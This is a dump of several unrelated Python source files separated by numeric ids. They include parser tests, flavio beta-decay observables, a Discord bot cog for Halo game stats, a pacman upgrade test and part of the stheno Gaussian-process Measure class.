assert subj[0] == 'the-count', subj
def test_nested_object(self):
sv = StatementsVisitor(self.schema, resolver)
data = {
'id': 'the-count',
'name': '<NAME>',
'memberships': [{
'role': 'Counter',
'organization': {
'name': 'Beans'
}
}]
}
stmts = list(sv.triplify(data))
assert len(stmts) == 9, len(stmts)
subj = [a for a, _, _, _ in stmts]
assert len(set(subj)) == 3, subj
def test_reverse_objectify(self):
sv = StatementsVisitor(self.schema, resolver)
data = {
'id': 'the-count',
'name': '<NAME>',
'memberships': [{
'role': 'Counter',
'organization': {
'id': 'beans',
'name': 'Beans'
}
}]
}
stmts = list(sv.triplify(data))
loader = load_maker(stmts)
obj = sv.objectify(loader, data['id'], depth=4)
assert obj['id'] == data['id']
oname = obj['memberships'][0]['organization']['name']
dname = obj['memberships'][0]['organization']['name']
assert oname == dname, obj
|
1689294
|
import doctest
from insights.combiners import package_provides_httpd
from insights.parsers.package_provides_httpd import PackageProvidesHttpd
from insights.combiners.package_provides_httpd import PackageProvidesHttpdAll
from insights.tests import context_wrap
PACKAGE_COMMAND_MATCH_1 = """
/opt/rh/httpd24/root/usr/sbin/httpd httpd24-httpd-2.4.34-7.el7.x86_64
"""
PACKAGE_COMMAND_MATCH_2 = """
/usr/sbin/httpd httpd-2.4.6-88.el7.x86_64
"""
PACKAGE_COMMAND_MATCH_3 = """
/opt/rh/jbcs-httpd24/root/usr/sbin/httpd jbcs-httpd24-httpd-2.4.34-7.el7.x86_64
"""
def test_packages_provide_httpd():
pack1 = PackageProvidesHttpd(context_wrap(PACKAGE_COMMAND_MATCH_1))
pack2 = PackageProvidesHttpd(context_wrap(PACKAGE_COMMAND_MATCH_2))
pack3 = PackageProvidesHttpd(context_wrap(PACKAGE_COMMAND_MATCH_3))
result = PackageProvidesHttpdAll([pack1, pack2, pack3])
assert sorted(result.running_httpds) == sorted(
['/opt/rh/httpd24/root/usr/sbin/httpd',
'/usr/sbin/httpd', '/opt/rh/jbcs-httpd24/root/usr/sbin/httpd'])
assert result["/usr/sbin/httpd"] == "httpd-2.4.6-88.el7.x86_64"
assert result.get_package("/opt/rh/httpd24/root/usr/sbin/httpd") == "httpd24-httpd-2.4.34-7.el7.x86_64"
assert result.get("/opt/rh/httpd24/root/usr/sbin/httpd") == "httpd24-httpd-2.4.34-7.el7.x86_64"
assert result.get_package("/usr/lib/httpd") is None
assert result.get("/usr/lib/httpd") is None
def test_doc_examples():
pack1 = PackageProvidesHttpd(context_wrap(PACKAGE_COMMAND_MATCH_1))
pack2 = PackageProvidesHttpd(context_wrap(PACKAGE_COMMAND_MATCH_2))
env = {
'packages': package_provides_httpd.PackageProvidesHttpdAll([pack1, pack2]),
}
failed, _ = doctest.testmod(package_provides_httpd, globs=env)
assert failed == 0
|
1689369
|
r"""Functions for nuclear and neutron beta decay effective couplings and $Ft$ values."""
from math import pi, log, sqrt
import flavio
from flavio.config import config
from flavio.physics.betadecays.common import wc_eff
from flavio.physics.ckm import get_ckm
from flavio.physics.taudecays.taulnunu import GFeff
from flavio.physics import elements
from flavio.classes import Observable, Prediction
import re
def xi(C, MF, MGT):
r"""Correlation coefficient $\xi$ as function of the effective couplings
`C`, the Fermi matrix element `MF` and the Gamow-Teller matrix element
`MGT`."""
# eq. (15) of arXiv:1803.08732
# note that C_i' = C_i
flavio.citations.register("Gonzalez-Alonso:2018omy")
return 2 * (abs(MF)**2 * (abs(C['V'])**2 + abs(C['S'])**2)
+ abs(MGT)**2 * (abs(C['A'])**2 + abs(C['T'])**2))
def a_xi(C, MF, MGT):
r"""Correlation coefficients $a\xi$ as function of the effective couplings
`C`, the Fermi matrix element `MF` and the Gamow-Teller matrix element
`MGT`."""
# eq. (16) of arXiv:1803.08732
# note that C_i' = C_i
flavio.citations.register("Gonzalez-Alonso:2018omy")
return 2 * (abs(MF)**2 * (abs(C['V'])**2 - abs(C['S'])**2)
- 1 / 3 * abs(MGT)**2 * (abs(C['A'])**2 - abs(C['T'])**2))
def a(C, MF, MGT):
r"""Correlation coefficient $a$ as function of the effective couplings
`C`, the Fermi matrix element `MF` and the Gamow-Teller matrix element
`MGT`."""
return a_xi(C, MF, MGT) / xi(C, MF, MGT)
def b_xi(C, MF, MGT, alpha, Z, s):
r"""Correlation coefficients $b\xi$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, the fine structure constant `alpha`, and the nucleon charge `Z`. The sign `s` is + for the electron and - for the positron."""
# eq. (17) of arXiv:1803.08732
# note that C_i' = C_i
flavio.citations.register("Gonzalez-Alonso:2018omy")
gamma = sqrt(1 - alpha**2 * Z**2)
return s * 2 * gamma * 2 * (abs(MF)**2 * (C['V'] * C['S'].conjugate()).real
+ abs(MGT)**2 * (C['A'] * C['T'].conjugate()).real)
def dl(Jp, J):
"""Kronecker's delta"""
if Jp == J:
return 1
else:
return 0
def la(Jp, J):
"""Eq. (A1)"""
if Jp == J - 1:
return 1
elif Jp == J:
return 1 / (J + 1)
elif Jp == J + 1:
return -J / (J + 1)
else:
raise ValueError("Invalid input for function `la`")
def A_xi(C, MF, MGT, J, Jf, s):
r"""Correlation coefficients $A\xi$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, and the angular momenta of initial and final state nuclei,
`J` and `Jf`. The sign `s` is + for the electron and - for the
positron."""
# note that C_i' = C_i
return 2 * (s * abs(MGT)**2 * la(Jf, J) * (abs(C['T'])**2 - abs(C['A'])**2)
+ dl(Jf, J) * abs(MF) * abs(MGT) * sqrt(J / (J + 1))
* (2 * C['S'] * C['T'].conjugate()
- 2 * C['V'] * C['A'].conjugate())).real
def B_xi(C, MF, MGT, J, Jf, me_E, s):
r"""Correlation coefficients $B\xi$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, and the angular momenta of initial and final state nuclei,
`J` and `Jf`. `me_E` is the ratio of electron mass and energy.
The sign `s` is + for the electron and - for the positron."""
# note that C_i' = C_i
return 2 * (abs(MGT)**2 * la(Jf, J) * (me_E * 2 * C['T'] * C['A'].conjugate()
+ s * (abs(C['T'])**2 + abs(C['A'])**2))
- dl(Jf, J) * abs(MF) * abs(MGT) * sqrt(J / (J + 1))
* ((2 * C['S'] * C['T'].conjugate()
+ 2 * C['V'] * C['A'].conjugate())
+ s * me_E * (2 * C['S'] * C['A'].conjugate()
+ 2 * C['V'] * C['T'].conjugate()))).real
def D_xi(C, MF, MGT, J, Jf):
r"""Correlation coefficients $D\xi$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, and the angular momenta of initial and final state nuclei,
`J` and `Jf`. `me_E` is the ratio of electron mass and energy."""
# note that C_i' = C_i
return 2 * (dl(Jf, J) * abs(MF) * abs(MGT) * sqrt(J / (J + 1))
* (2 * C['S'] * C['T'].conjugate()
- 2 * C['V'] * C['A'].conjugate())).imag
def R_xi(C, MF, MGT, J, Jf, s):
r"""Correlation coefficients $R\xi$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, and the angular momenta of initial and final state nuclei,
`J` and `Jf`. The sign `s` is + for the electron and - for the positron."""
# note that C_i' = C_i
return 2 * (s * abs(MGT)**2 * la(Jf, J) * 2 * C['T'] * C['A'].conjugate()
+ dl(Jf, J) * abs(MF) * abs(MGT) * sqrt(J / (J + 1))
* (2 * C['S'] * C['A'].conjugate()
- 2 * C['V'] * C['T'].conjugate())).imag
def b(C, MF, MGT, alpha, Z, s):
r"""Correlation coefficient $b$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, the fine structure constant `alpha`, and the nucleon charge `Z`."""
return b_xi(C, MF, MGT, alpha, Z, s) / xi(C, MF, MGT)
def A(C, MF, MGT, J, Jf, s):
r"""Correlation coefficient $A$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, and the angular momenta of initial and final state nuclei,
`J` and `Jf`. The sign `s` is + for the electron and - for the
positron."""
return A_xi(C, MF, MGT, J, Jf, s) / xi(C, MF, MGT)
def B(C, MF, MGT, J, Jf, me_E, s):
r"""Correlation coefficient $B$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, and the angular momenta of initial and final state nuclei,
`J` and `Jf`. `me_E` is the ratio of electron mass and energy.
The sign `s` is + for the electron and - for the positron."""
return B_xi(C, MF, MGT, J, Jf, me_E, s) / xi(C, MF, MGT)
def D(C, MF, MGT, J, Jf):
r"""Correlation coefficient $D$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, and the angular momenta of initial and final state nuclei,
`J` and `Jf`."""
return D_xi(C, MF, MGT, J, Jf) / xi(C, MF, MGT)
def R(C, MF, MGT, J, Jf, s):
r"""Correlation coefficient $R$ as function of the effective couplings
`C`, the Fermi matrix element `MF`, the Gamow-Teller matrix element
`MGT`, and the angular momenta of initial and final state nuclei,
`J` and `Jf`. The sign `s` is + for the electron and - for the positron."""
return R_xi(C, MF, MGT, J, Jf, s) / xi(C, MF, MGT)
def K(par):
me = par['m_e']
return 2 * pi**3 * log(2) / me**5
# <me/E> from Table 4 of arXiv:1803.08732
nuclei_superallowed = {
# superallowed 0+->0+
'10C': {'Z': 6, '<me/E>': 0.619, 'tex': r'{}^{10}\text{C}'},
'14O': {'Z': 8, '<me/E>': 0.438, 'tex': r'{}^{14}\text{O}'},
'22Mg': {'Z': 12, '<me/E>': 0.310, 'tex': r'{}^{22}\text{Mg}'},
'26mAl':{'Z': 13, '<me/E>': 0.300, 'tex': r'{}^{26m}\text{Al}'},
'34Cl': {'Z': 17, '<me/E>': 0.234, 'tex': r'{}^{34}\text{Cl}'},
'34Ar': {'Z': 18, '<me/E>': 0.212, 'tex': r'{}^{34}\text{Ar}'},
'38mK': {'Z': 19, '<me/E>': 0.213, 'tex': r'{}^{38m}\text{K}'},
'38Ca': {'Z': 20, '<me/E>': 0.195, 'tex': r'{}^{38}\text{Ca}'},
'42Sc': {'Z': 21, '<me/E>': 0.201, 'tex': r'{}^{42}\text{Sc}'},
'46V': {'Z': 23, '<me/E>': 0.183, 'tex': r'{}^{46}\text{V}'},
'50Mn': {'Z': 25, '<me/E>': 0.169, 'tex': r'{}^{50}\text{Mn}'},
'54Co': {'Z': 27, '<me/E>': 0.157, 'tex': r'{}^{54}\text{Co}'},
'62Ga': {'Z': 31, '<me/E>': 0.141, 'tex': r'{}^{62}\text{Ga}'},
'74Rb': {'Z': 37, '<me/E>': 0.125, 'tex': r'{}^{74}\text{Rb}'},
}
def Ft_superallowed(par, wc_obj, A):
r"""Corrected $\mathcal{F}t$ value of the beta decay of isotope `A`."""
MF = sqrt(2)
MGT = 0
Z = nuclei_superallowed[A]['Z']
scale = config['renormalization scale']['betadecay']
C = wc_eff(par, wc_obj, scale, nu='e')
Xi = xi(C, MF, MGT)
B = b(C, MF, MGT, par['alpha_e'], Z, s=-1) # s=-1 for beta+ decay
me_E = nuclei_superallowed[A]['<me/E>']
Vud = get_ckm(par)[0, 0]
GF = GFeff(wc_obj, par)
pre = GF / sqrt(2) * Vud
ddRp = par['delta_deltaRp_Z2'] * Z**2 # relative uncertainty on \delta R' (universal)
return (1 + ddRp) * K(par) / Xi * 1 / (1 + B * me_E) / abs(pre)**2
class NeutronObservable:
def __init__(self, wc_obj, par, me_E):
self.wc_obj = wc_obj
self.par = par
self.me_E = me_E
self.MF = 1
self.MGT = sqrt(3)
self.scale = config['renormalization scale']['betadecay']
self.C = wc_eff(par, wc_obj, self.scale, nu='e')
self.s = 1 # electron e- in final state
self.Z = 0
self.alpha = par['alpha_e']
self.J = 1 / 2
self.Jf = 1 / 2
def xi(self):
return xi(self.C, self.MF, self.MGT)
def a(self):
return a(self.C, self.MF, self.MGT)
def b(self):
return b(self.C, self.MF, self.MGT, self.alpha, self.Z, self.s)
def A(self):
return A(self.C, self.MF, self.MGT, self.J, self.Jf, self.s)
def B(self):
return B(self.C, self.MF, self.MGT, self.J, self.Jf, self.me_E, self.s)
def D(self):
return D(self.C, self.MF, self.MGT, self.J, self.Jf)
def R(self):
return R(self.C, self.MF, self.MGT, self.J, self.Jf, self.s)
class Neutron_tau(NeutronObservable):
def __init__(self, wc_obj, par, me_E):
super().__init__(wc_obj, par, me_E)
def __call__(self):
Vud = get_ckm(self.par)[0, 0]
GF = GFeff(self.wc_obj, self.par)
pre = GF / sqrt(2) * Vud
ft = K(self.par) / self.xi() * 1 / (1 + self.b() * self.me_E) / abs(pre)**2
fn = self.par['f_n']
Rp = self.par['deltaRp_n']
return ft / log(2) / fn / (1 + Rp)
class Neutron_corr(NeutronObservable):
def __init__(self, wc_obj, par, me_E, coeff):
super().__init__(wc_obj, par, me_E)
self.coeff = coeff
def __call__(self):
if self.coeff == 'a':
return self.a()
elif self.coeff == 'atilde':
return self.a() / (1 + self.b() * self.me_E)
if self.coeff == 'b':
return self.b()
elif self.coeff == 'A':
return self.A()
elif self.coeff == 'Atilde':
return self.A() / (1 + self.b() * self.me_E)
elif self.coeff == 'B':
return self.B()
elif self.coeff == 'Btilde':
return self.B() / (1 + self.b() * self.me_E)
elif self.coeff == 'lambdaAB':
_A = self.A()
_B = self.B()
return (_A - _B) / (_A + _B)
elif self.coeff == 'D':
return self.D()
elif self.coeff == 'R':
return self.R()
# Closures for prediction instances
def Ft_fct(A):
def _(wc_obj, par):
return Ft_superallowed(par, wc_obj, A)
return _
def get_daughter(nuclide):
r"""Get the symbol and tex code of the daughter nuclide."""
A = re.search(r'\d+', nuclide).group()
symbol = re.search(r'[A-Z].*', nuclide).group()
Z = elements.Z(symbol)
daughter_symbol = elements.symbol(Z - 1)
return {'name': '{}{}'.format(A, daughter_symbol),
'tex': r'{{}}^{{{}}}\text{{{}}}'.format(A, daughter_symbol)}
# Observable and Prediction instances
for _A, _Ad in nuclei_superallowed.items():
Dd = get_daughter(_A)
_process_tex = _Ad['tex'] + r"\to " + Dd['tex'] + r"\,e^+\nu_e"
_process_taxonomy = r'Process :: Nucleon decays :: Beta decays :: Superallowed $0^+\to 0^+$ decays :: $' + _process_tex + r"$"
_obs_name = "Ft(" + _A + ")"
_obs = Observable(_obs_name)
_obs.set_description(r"$\mathcal Ft$ value of $" + _Ad['tex'] + r"$ beta decay")
_obs.tex = r"$\mathcal{F}t(" + _Ad['tex'] + r")$"
_obs.add_taxonomy(_process_taxonomy)
Prediction(_obs_name, Ft_fct(_A))
_process_tex = r"n\to p^+ e^-\bar\nu_e"
_process_taxonomy = r'Process :: Nucleon decays :: Beta decays :: Neutron decay :: $' + _process_tex + r"$"
_obs_name = "tau_n"
_obs = Observable(_obs_name, arguments=['me_E'])
_obs.set_description(r"Neutron lifetime")
_obs.tex = r"$\tau_n$"
_obs.add_taxonomy(_process_taxonomy)
func = lambda wc_obj, par, me_E: Neutron_tau(wc_obj, par, me_E)()
Prediction(_obs_name, func)
# coefficients that don't depend on me/E
coeffs = {
'a': 'a_n',
'A': 'A_n',
'D': 'D_n',
'R': 'R_n',
}
# coefficients that depend on me/E
coeffs_mE = {
'atilde': r'\tilde{a}_n',
'b': 'b_n',
'Atilde': r'\tilde{A}_n',
'B': 'B_n', 'Btilde': r'\tilde{B}_n',
'lambdaAB': r'\lambda_{AB}',
}
def make_obs_neutron_corr(coeff, me_E=False):
_process_tex = r"n\to p^+ e^-\bar\nu_e"
_process_taxonomy = r'Process :: Nucleon decays :: Beta decays :: Neutron decay :: $' + _process_tex + r"$"
_obs_name = coeff + "_n"
if me_E:
_obs = Observable(_obs_name, arguments=['me_E'])
else:
_obs = Observable(_obs_name)
_obs.set_description(r"Correlation coefficient $" + tex + r"$ in neutron beta decay")
_obs.tex = r"$" + tex + r"$"
_obs.add_taxonomy(_process_taxonomy)
if me_E:
func = lambda wc_obj, par, me_E: Neutron_corr(wc_obj, par, me_E, coeff)()
else:
func = lambda wc_obj, par: Neutron_corr(wc_obj, par, None, coeff)()
Prediction(_obs_name, func)
for coeff, tex in coeffs.items():
make_obs_neutron_corr(coeff, me_E=False)
for coeff, tex in coeffs_mE.items():
make_obs_neutron_corr(coeff, me_E=True)
|
1689388
|
import asyncio
from random import choice as randchoice
import aiohttp
import discord
from redbot.core import Config, checks, commands
numbs = {"next": "➡", "back": "⬅", "exit": "❌"}
class Halo(commands.Cog):
"""
Display Halo 5 and Halo Wars 2 stats and information
"""
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession(loop=self.bot.loop)
default_global = {"api_token": {"token": "", "language": "en"}}
self.config = Config.get_conf(self, 35689771456)
self.config.register_global(**default_global)
async def red_delete_data_for_user(self, **kwargs):
"""
Nothing to delete
"""
return
async def request_url(self, url, params=None):
header_data = await self.config.api_token()
header = {
"Ocp-Apim-Subscription-Key": header_data["token"],
"Accept-Language": header_data["language"],
}
async with self.session.get(url, params=params, headers=header) as resp:
return await resp.json()
@commands.group(name="halo5")
@checks.admin_or_permissions(manage_guild=True)
async def _halo5(self, ctx):
"""Get information from Halo 5"""
pass
@commands.group(name="halowars")
@checks.admin_or_permissions(manage_guild=True)
async def _halowars(self, ctx):
"""Get information from Halo Wars 2"""
pass
def random_colour(self):
return int("".join([randchoice("0123456789ABCDEF") for x in range(6)]), 16)
async def halo5_playlist_menu(
self, ctx, post_list: list, message: discord.Message = None, page=0, timeout: int = 30
):
"""menu control logic for this taken from
https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py"""
s = post_list[page]
created_at = ctx.message.created_at
desc = "Created at: {}".format(created_at)
em = discord.Embed(
title=s["name"],
description=s["description"],
colour=discord.Colour(value=self.random_colour()),
timestamp=created_at,
)
em.add_field(name="Gamemode", value=s["gameMode"])
em.add_field(name="Ranked", value=str(s["isRanked"]))
if s["imageUrl"] is not None:
em.set_image(url=s["imageUrl"])
if not message:
message = await ctx.send(embed=em)
await message.add_reaction("⬅")
await message.add_reaction("❌")
await message.add_reaction("➡")
else:
# message edits don't return the message object anymore lol
await message.edit(embed=em)
check = lambda react, user: user == ctx.message.author and react.emoji in ["➡", "⬅", "❌"]
try:
react, user = await self.bot.wait_for("reaction_add", check=check, timeout=timeout)
except asyncio.TimeoutError:
await message.remove_reaction("⬅", self.bot.user)
await message.remove_reaction("❌", self.bot.user)
await message.remove_reaction("➡", self.bot.user)
return None
else:
reacts = {v: k for k, v in numbs.items()}
react = reacts[react.emoji]
if react == "next":
next_page = 0
if page == len(post_list) - 1:
next_page = 0 # Loop around to the first item
else:
next_page = page + 1
return await self.halo5_playlist_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
elif react == "back":
next_page = 0
if page == 0:
next_page = len(post_list) - 1 # Loop around to the last item
else:
next_page = page - 1
return await self.halo5_playlist_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
else:
return await message.delete()
@_halo5.command(name="playlist")
async def halo5_playlist(self, ctx, active=True):
"""Gathers data about active Halo 5 playlists"""
data = await self.request_url("https://www.haloapi.com/metadata/h5/metadata/playlists")
list_active = []
for playlist in data:
if playlist["isActive"]:
list_active.append(playlist)
await self.halo5_playlist_menu(ctx, list_active)
async def halowars_playlist_menu(
self, ctx, post_list: list, message: discord.Message = None, page=0, timeout: int = 30
):
"""menu control logic for this taken from
https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py"""
s = post_list[page]
created_at = ctx.message.created_at
desc = "Created at: {}".format(created_at)
em = discord.Embed(
title=s["View"]["Title"],
# description=s["description"],
colour=discord.Colour(value=self.random_colour()),
timestamp=created_at,
)
# em.add_field(name="Gamemode", value=s["gameMode"])
# em.add_field(name="Ranked", value=str(s["isRanked"]))
# if s["HW2Playlist"][] is not None:
em.set_image(url=s["View"]["HW2Playlist"]["Image"]["View"]["Media"]["MediaUrl"])
if not message:
message = await ctx.send(embed=em)
await message.add_reaction("⬅")
await message.add_reaction("❌")
await message.add_reaction("➡")
else:
# message edits don't return the message object anymore lol
await message.edit(embed=em)
check = lambda react, user: user == ctx.message.author and react.emoji in ["➡", "⬅", "❌"]
try:
react, user = await self.bot.wait_for("reaction_add", check=check, timeout=timeout)
except asyncio.TimeoutError:
await message.remove_reaction("⬅", self.bot.user)
await message.remove_reaction("❌", self.bot.user)
await message.remove_reaction("➡", self.bot.user)
return None
else:
reacts = {v: k for k, v in numbs.items()}
react = reacts[react.emoji]
if react == "next":
next_page = 0
if page == len(post_list) - 1:
next_page = 0 # Loop around to the first item
else:
next_page = page + 1
return await self.halowars_playlist_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
elif react == "back":
next_page = 0
if page == 0:
next_page = len(post_list) - 1 # Loop around to the last item
else:
next_page = page - 1
return await self.halowars_playlist_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
else:
return await message.delete()
async def get_halo5_rank_data(self, designation_id, tier_id):
rank_data = await self.request_url(
"https://www.haloapi.com/metadata/h5/metadata/csr-designations"
)
designation = [x for x in rank_data if x["id"] == str(designation_id)]
image_url = [x["iconImageUrl"] for x in designation[0]["tiers"] if x["id"] == str(tier_id)]
return designation[0]["name"], image_url
@_halo5.command(name="rank")
async def Halo5_rank(self, ctx, *, gamertag):
"""Gather playter rank information from Halo 5"""
colours = {
"Unranked": "7f7f7f",
"Bronze": "c27c0e",
"Silver": "cccccc",
"Gold": "xf1c40f",
"Platinum": "e5e5e5",
"Diamond": "ffffff",
"Onyx": "000000",
"Champion": "71368a",
}
player_data = await self.request_url(
"https://www.haloapi.com/stats/h5/servicerecords/arena?", {"players": gamertag}
)
tier = player_data["Results"][0]["Result"]["ArenaStats"]["HighestCsrAttained"]["Tier"]
designation = player_data["Results"][0]["Result"]["ArenaStats"]["HighestCsrAttained"][
"DesignationId"
]
designation_name, image_url = await self.get_halo5_rank_data(designation, tier)
embed = discord.Embed(
title=gamertag,
description=designation_name,
colour=discord.Colour(value=int(colours[designation_name], 16)),
timestamp=ctx.message.created_at,
)
embed.add_field(name="Designation", value=str(designation), inline=True)
embed.add_field(name="Tier", value=str(tier), inline=True)
embed.set_thumbnail(url=image_url[0])
await ctx.send(embed=embed)
@_halowars.command(name="playlist")
async def halowars_playlist(self, ctx, active=True):
"""Gathers data about active Halo 5 playlists"""
data = await self.request_url("https://www.haloapi.com/metadata/hw2/playlists")
list_active = []
for playlist in data["ContentItems"]:
# print(playlist)
if not playlist["View"]["HW2Playlist"]["Hide"]:
list_active.append(playlist)
await self.halowars_playlist_menu(ctx, list_active)
@commands.group(name="haloset")
@checks.is_owner()
async def _haloset(self, ctx):
"""Command for setting required access information for the API.
To get this info, visit https://developer.haloapi.com and create a new application."""
pass
@_haloset.command()
async def tokens(self, ctx, subscription_key, language="en"):
"""Set the tokens and language for requests from the API"""
await self.config.api_token.token.set(subscription_key)
await self.config.api_token.language.set(language)
await ctx.send("Halo API credentials set!")
def cog_unload(self):
self.bot.loop.create_task(self.session.close())
__unload = cog_unload
|
1689395
|
self.description = "Sysupgrade with ignored package prevent other upgrade"
lp1 = pmpkg("glibc", "1.0-1")
lp2 = pmpkg("gcc-libs", "1.0-1")
lp2.depends = ["glibc>=1.0-1"]
lp3 = pmpkg("pcre", "1.0-1")
lp3.depends = ["gcc-libs"]
for p in lp1, lp2, lp3:
self.addpkg2db("local", p)
sp1 = pmpkg("glibc", "1.0-2")
sp2 = pmpkg("gcc-libs", "1.0-2")
sp2.depends = ["glibc>=1.0-2"]
sp3 = pmpkg("pcre", "1.0-2")
sp3.depends = ["gcc-libs"]
for p in sp1, sp2, sp3:
self.addpkg2db("sync", p)
self.args = "-Su --ignore %s --ask=16" % sp1.name
self.addrule("PACMAN_RETCODE=0")
self.addrule("PKG_VERSION=glibc|1.0-1")
self.addrule("PKG_VERSION=gcc-libs|1.0-1")
self.addrule("PKG_VERSION=pcre|1.0-2")
|
1689407
|
from types import FunctionType
from lab import B
from matrix import Constant
from mlkernels import (
num_elements,
ZeroKernel,
TensorProductKernel,
)
from plum import Union
from .fdd import FDD
from .gp import GP, assert_same_measure
from .observations import (
AbstractObservations,
Observations,
PseudoObservations,
combine,
)
from .. import _dispatch, PromisedMeasure
from ..lazy import LazyVector, LazyMatrix
from ..mo import MultiOutputKernel as MOK, MultiOutputMean as MOM
from ..random import Normal
__all__ = ["Measure"]
class Measure:
"""A GP model.
Attributes:
ps (list[:class:`.gp.GP`]): Processes of the measure.
mean (:class:`stheno.lazy.LazyVector`): Mean.
kernels (:class:`stheno.lazy.LazyMatrix`): Kernels.
default (:class:`.measure.Measure` or None): Global default measure.
"""
default = None
def __init__(self):
self.ps = []
self._pids = set()
self.means = LazyVector()
self.kernels = LazyMatrix()
# Store named GPs in both ways.
self._gps_by_name = {}
self._names_by_gp = {}
self._prev_default = None
def __enter__(self):
self._prev_default = self.default
Measure.default = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
Measure.default = self._prev_default
def __hash__(self):
# This is needed for :func:`.gp.intersection_measure_group`, which puts
# many :class:`.measure.Measure`s in a `set`. Every measure is unique.
return id(self)
@_dispatch
def __getitem__(self, name: str):
return self._gps_by_name[name]
@_dispatch
def __getitem__(self, p: GP):
return self._names_by_gp[id(p)]
@_dispatch
def name(self, p: GP, name: str):
"""Name a GP.
Args:
p (:class:`.gp.GP`): GP to name.
name (str): Name. Must be unique.
"""
# Delete any existing names and back-references for the GP.
if id(p) in self._names_by_gp:
del self._gps_by_name[self._names_by_gp[id(p)]]
del self._names_by_gp[id(p)]
# Check that name is not in use.
if name in self._gps_by_name:
raise RuntimeError(
f'Name "{name}" for "{p}" already taken by "{self[name]}".'
)
# Set the name and the back-reference.
self._gps_by_name[name] = p
self._names_by_gp[id(p)] = name
def _add_p(self, p):
# Attach process to measure.
self.ps.append(p)
self._pids.add(id(p))
# Add measure to list of measures of process.
p._measures.append(self)
def _update(self, p, mean, kernel, left_rule, right_rule=None):
# Update means.
self.means[p] = mean
# Update kernels.
self.kernels[p] = kernel
self.kernels.add_left_rule(id(p), self._pids, left_rule)
if right_rule:
self.kernels.add_right_rule(id(p), self._pids, right_rule)
else:
self.kernels.add_right_rule(
id(p), self._pids, lambda i: reversed(self.kernels[p, i])
)
# Only now add `p`: `self.pids` above needs to not include `id(p)`.
self._add_p(p)
return p
@_dispatch
def __call__(self, p: GP):
# Make a new GP with `self` as the prior.
p_copy = GP()
return self._update(
p_copy,
self.means[p],
self.kernels[p],
# `p_copy` acts like `p`.
lambda j: self.kernels[p, j], # Left rule
lambda i: self.kernels[i, p], # Right rule
)
@_dispatch
def __call__(self, fdd: FDD):
return self(fdd.p)(fdd.x, fdd.noise)
def add_independent_gp(self, p, mean, kernel):
"""Add an independent GP to the model.
Args:
p (:class:`.gp.GP`): GP to add.
mean (:class:`mlkernels.Mean`): Mean function of GP.
kernel (:class:`mlkernels.Kernel`): Kernel function of GP.
Returns:
:class:`.gp.GP`: The newly added independent GP.
"""
# Update means.
self.means[p] = mean
# Update kernels.
self.kernels[p] = kernel
self.kernels.add_left_rule(id(p), self._pids, lambda j: ZeroKernel())
self.kernels.add_right_rule(id(p), self._pids, lambda i: ZeroKernel())
# Only now add `p`: `self.pids` above needs to not include `id(p)`.
self._add_p(p)
return p
@_dispatch
def sum(self, p_sum: GP, other, p: GP):
"""Sum a GP from the graph with another object.
Args:
p_sum (:class:`.gp.GP`): GP that is the sum.
obj1 (other type or :class:`.gp.GP`): First term in the sum.
obj2 (other type or :class:`.gp.GP`): Second term in the sum.
Returns:
:class:`.gp.GP`: The GP corresponding to the sum.
"""
return self.sum(p_sum, p, other)
@_dispatch
def sum(self, p_sum: GP, p: GP, other: Union[B.Numeric, FunctionType]):
return self._update(
p_sum,
self.means[p] + other,
self.kernels[p],
lambda j: self.kernels[p, j],
)
@_dispatch
def sum(self, p_sum: GP, p1: GP, p2: GP):
assert_same_measure(p1, p2)
return self._update(
p_sum,
self.means[p1] + self.means[p2],
(
self.kernels[p1]
+ self.kernels[p2]
+ self.kernels[p1, p2]
+ self.kernels[p2, p1]
),
lambda j: self.kernels[p1, j] + self.kernels[p2, j],
)
@_dispatch
def mul(self, p_mul: GP, other, p: GP):
"""Multiply a GP from the graph with another object.
Args:
p_mul (:class:`.gp.GP`): GP that is the product.
obj1 (object): First factor in the product.
obj2 (object): Second factor in the product.
other (object): Other object in the product.
Returns:
:class:`.gp.GP`: The GP corresponding to the product.
"""
return self.mul(p_mul, p, other)
@_dispatch
def mul(self, p_mul: GP, p: GP, other: B.Numeric):
return self._update(
p_mul,
self.means[p] * other,
self.kernels[p] * other ** 2,
lambda j: self.kernels[p, j] * other,
)
@_dispatch
def mul(self, p_mul: GP, p: GP, f: FunctionType):
def ones(x):
return Constant(B.one(x), num_elements(x), 1)
return self._update(
p_mul,
f * self.means[p],
f * self.kernels[p],
lambda j: TensorProductKernel(f, ones) * self.kernels[p, j],
)
@_dispatch
def mul(self, p_mul: GP, p1: GP, p2: GP):
assert_same_measure(p1, p2)
term1 = self.sum(
GP(),
self.mul(GP(), lambda x: self.means[p1](x), p2),
self.mul(GP(), p1, lambda x: self.means[p2](x)),
)
term2 = self.add_independent_gp(
GP(),
-self.means[p1] * self.means[p2],
(
self.kernels[p1] * self.kernels[p2]
+ self.kernels[p1, p2] * self.kernels[p2, p1]
),
)
return self.sum(p_mul, term1, term2)
def shift(self, p_shifted, p, shift):
"""Shift a GP.
Args:
p_shifted (:class:`.gp.GP`): Shifted GP.
p (:class:`.gp.GP`): GP to shift.
shift (object): Amount to shift by.
Returns:
:class:`.gp.GP`: The shifted GP.
"""
return self._update(
p_shifted,
self.means[p].shift(shift),
self.kernels[p].shift(shift),
lambda j: self.kernels[p, j].shift(shift, 0),
)
def stretch(self, p_stretched, p, stretch):
